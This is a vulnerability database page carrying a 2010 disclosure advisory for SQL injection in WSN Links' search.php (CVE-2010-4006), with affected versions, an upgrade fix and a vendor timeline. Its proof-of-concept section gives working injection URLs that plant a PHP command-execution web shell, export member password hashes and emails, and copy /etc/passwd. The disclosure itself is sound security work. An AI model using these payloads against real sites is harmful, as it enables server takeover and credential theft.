WSN Links - SQL Injection

🗓️ 24 Nov 2010 00:00:00Reported by Mark StanislavType

'WSN Links' SQL Injection Vulnerability (CVE-2010-4006). SQL injection in search.php allows 'UNION SELECT' exploits

Reporter	Title	Published	Views	Family All 12
0day.today	WSN Links SQL Injection Vulnerability	25 Nov 201000:00	–	zdt
CVE	CVE-2010-4006	3 Nov 201019:00	–	cve
Cvelist	CVE-2010-4006	3 Nov 201019:00	–	cvelist
EUVD	EUVD-2010-3982	7 Oct 202500:30	–	euvd
exploitpack	WSN Links - SQL Injection	24 Nov 201000:00	–	exploitpack
myhack58	WSN Links SQL injection vulnerability-vulnerability warning-the black bar safety net	26 Nov 201000:00	–	myhack58
NVD	CVE-2010-4006	3 Nov 201020:00	–	nvd
Packet Storm	WSN Links SQL Injection	2 Nov 201000:00	–	packetstorm
Prion	Sql injection	3 Nov 201020:00	–	prion
securityvulns	'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)	2 Nov 201000:00	–	securityvulns

'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - [email protected]


I. DESCRIPTION
---------------------------------------
A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portions of SQL code between the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections can occur. 

 
II. AFFECTED VERSIONS
---------------------------------------
< 6.0.1; < 5.1.51 ; < 5.0.81


III. TESTED VERSIONS
---------------------------------------
5.1.40 & 5.1.49


IV. PoC EXPLOITS 
---------------------------------------
1) A 'UNION SELECT' which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories

2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail to be extracted to a file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories

3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories


V. NOTES 
---------------------------------------
* The above exploits require 'FILE' SQL privilege as well as poor web directory permissions to work. 
* Only 'namecondition' and 'namesearch' are utilized for the actual SQL injection.
* There is potential to exploit this vulnerability which outputs user data directly to the browser.
* Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN Links' deployments.


VI. SOLUTION
---------------------------------------
Upgrade to the most recent version of your 'WSN Links' code branch.


VII. REFERENCES
---------------------------------------
http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/

VIII. TIMELINE
---------------------------------------
10/10/2010: Initial discloure e-mail to the vendor
10/18/2010: Follow-up via the vendor's contact web form
10/18/2010: Vendor acknowledgement/commitment to fix
10/21/2010: Patched versions released
10/31/2010: Public disclosure

24 Nov 2010 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 27.5

EPSS0.01376

sql injection 'wsn links'cve-2010-4006 search.php 'union select'vulnerability exploit upgrade debug mode